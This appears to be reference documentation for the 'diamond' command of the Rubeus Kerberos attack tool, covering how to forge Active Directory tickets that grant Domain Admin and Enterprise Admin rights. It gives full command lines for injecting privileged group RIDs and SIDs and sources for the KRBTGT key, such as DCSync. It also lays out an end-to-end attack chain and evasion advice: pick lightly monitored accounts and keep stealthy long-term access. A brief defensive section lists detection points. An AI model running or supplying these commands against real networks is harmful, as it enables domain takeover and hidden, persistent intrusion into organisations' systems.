Skip to main content

Overview

Create diamond tickets, a sophisticated ticket forgery technique that combines legitimate TGT components with forged elements. This approach leverages legitimate authentication while modifying specific ticket attributes, making detection significantly more challenging than traditional golden tickets.

Syntax

Rubeus.exe diamond /user:USER /password:PASSWORD [krbkey] [options]

Authentication Parameters

user
string
required
Username for authentication
password
string
Password for authentication
rc4
string
RC4/NTLM hash for authentication
aes128
string
AES128 key for authentication
aes256
string
AES256 key for authentication

Kerberos Key Parameters

krbkey
string
Kerberos key for ticket decryption/modification (AES256 preferred)
krbenctype
string
Encryption type for Kerberos key (default: aes256)

Modification Options

groups
string
Comma-separated list of group RIDs to inject
sids
string
Additional SIDs to include in ticket
endtime
string
Custom ticket end time
renew
string
Custom ticket renew time

Output Options

outfile
string
Save forged ticket to file
ptt
boolean
Pass-the-ticket (inject immediately)

Examples

# Create diamond ticket with password
Rubeus.exe diamond /user:testuser /password:password123 /krbkey:aes256_key /groups:512

# Create with hash authentication
Rubeus.exe diamond /user:serviceaccount /rc4:ntlm_hash /krbkey:aes256_key /groups:512,519

# Create and inject immediately
Rubeus.exe diamond /user:normaluser /password:pass /krbkey:key /groups:512 /ptt

Technical Overview

Hybrid Approach:
  • Starts with legitimate TGT from real authentication
  • Decrypts legitimate ticket components
  • Modifies specific attributes (groups, privileges)
  • Re-encrypts with legitimate structure
Advantages over Golden Tickets:
  • Uses legitimate authentication patterns
  • Maintains realistic ticket characteristics
  • Harder to detect than purely forged tickets
  • Leverages actual user credentials
Process Steps:
  1. Legitimate Authentication: Request TGT with valid credentials
  2. Ticket Decryption: Decrypt TGT using KDC key material
  3. Attribute Modification: Add privileged groups or SIDs
  4. Re-encryption: Encrypt modified ticket with KDC key
  5. Ticket Injection: Use modified ticket for authentication
Key Requirements:
  • Valid user credentials (password or hash)
  • KDC key material (KRBTGT key)
  • Understanding of ticket structure
  • Proper encryption handling

Credential Requirements

Legitimate Credentials:
  • Valid domain user password
  • User NTLM hash from previous compromise
  • User AES keys from Kerberos operations
  • Any authentication method accepted by KDC
Account Targeting:
  • Low-privilege user accounts (less suspicious)
  • Service accounts with legitimate access
  • Test accounts with known credentials
  • Accounts with minimal monitoring
KRBTGT Key Sources:
  • DCSync attacks against domain controllers
  • Memory dumps from compromised DCs
  • Cached KRBTGT keys from previous operations
  • Golden ticket creation prerequisites
Key Types:
# AES256 preferred for stronger encryption
Rubeus.exe diamond /user:user /password:pass /krbkey:aes256_krbtgt_key

# AES128 alternative
Rubeus.exe diamond /user:user /rc4:hash /krbkey:aes128_krbtgt_key /krbenctype:aes128

# RC4 for legacy compatibility
Rubeus.exe diamond /user:user /password:pass /krbkey:rc4_krbtgt_key /krbenctype:rc4

Privilege Escalation

Administrative Groups:
# Domain Admins
Rubeus.exe diamond /user:lowpriv /password:pass /krbkey:key /groups:512

# Enterprise Admins
Rubeus.exe diamond /user:user /rc4:hash /krbkey:key /groups:519

# Multiple administrative groups
Rubeus.exe diamond /user:user /password:pass /krbkey:key /groups:512,519,520
Group RID Reference:
  • 512: Domain Admins
  • 519: Enterprise Admins
  • 520: Group Policy Creator Owners
  • 518: Schema Admins
  • Custom organizational groups
Additional Privileges:
# Inject custom SIDs
Rubeus.exe diamond /user:user /password:pass /krbkey:key /sids:S-1-5-21-domain-1001,S-1-5-21-domain-1002

# Combine groups and SIDs
Rubeus.exe diamond /user:user /rc4:hash /krbkey:key /groups:512 /sids:S-1-5-21-domain-custom
SID Sources:
  • High-privilege custom groups
  • Service-specific permissions
  • Cross-domain trust relationships
  • Application-specific roles

Operational Advantages

Legitimate Characteristics:
  • Real authentication event logs
  • Valid ticket structure and timing
  • Proper encryption and signatures
  • Normal user authentication patterns
Reduced Indicators:
  • No purely forged ticket artifacts
  • Matches expected user behavior
  • Uses legitimate authentication flows
  • Maintains realistic ticket attributes
Long-term Access:
  • Survives normal password changes (until KRBTGT rotation)
  • Maintains elevated privileges
  • Provides stealth administrative access
  • Supports long-term operations
Flexibility:
  • Use any legitimate user account
  • Modify privilege levels as needed
  • Create multiple variants for different purposes
  • Adapt to changing operational requirements

Integration Workflows

Complete Attack Chain:
# 1. Obtain legitimate user credentials
# Through various attack vectors (phishing, hash dumping, etc.)

# 2. Obtain KRBTGT key material
# Through DCSync or other domain controller compromise

# 3. Create diamond ticket
Rubeus.exe diamond /user:compromised_user /password:known_pass /krbkey:krbtgt_aes256 /groups:512 /ptt

# 4. Use elevated privileges
# Access domain controllers, perform administrative tasks
Low-Profile Operations:
# 1. Use low-privilege account with known credentials
Rubeus.exe diamond /user:testuser /password:simple_pass /krbkey:krbtgt_key /groups:512

# 2. Perform administrative tasks
# Access restricted resources, modify domain objects

# 3. Clean up and return to normal operations
# Remove elevated access, return to baseline

Defensive Considerations

Limited Indicators:
  • Legitimate authentication events
  • Valid ticket structure and encryption
  • Normal user behavior patterns
  • Difficult to distinguish from legitimate access
Detection Opportunities:
  • Unusual privilege escalation patterns
  • Administrative access from low-privilege accounts
  • Ticket analysis for modified attributes
  • Behavioral analysis of user activities
Technical Controls:
  • Regular KRBTGT key rotation
  • Enhanced authentication monitoring
  • Privileged access management (PAM)
  • Ticket inspection and validation
Operational Measures:
  • Regular credential rotation
  • Monitoring for unusual administrative access
  • User behavior analytics
  • Incident response procedures

Troubleshooting

Authentication Failures:
  • Invalid user credentials
  • Account lockout or disabled status
  • Network connectivity problems
  • Domain controller accessibility
Ticket Creation Errors:
  • Incorrect KRBTGT key material
  • Encryption type mismatches
  • Invalid group or SID specifications
  • Timing or format issues
Performance Improvements:
  • Use AES256 encryption for better security
  • Optimize group selections for specific targets
  • Cache KRBTGT keys for repeated use
  • Streamline authentication processes
Success Rate Enhancement:
  • Verify user account status before operation
  • Test KRBTGT key validity
  • Use realistic timing and attribute values
  • Monitor for defensive responses
  • golden - Traditional golden ticket forgery
  • asktgt - Legitimate TGT requests
  • ptt - Inject diamond tickets
  • describe - Analyze ticket structure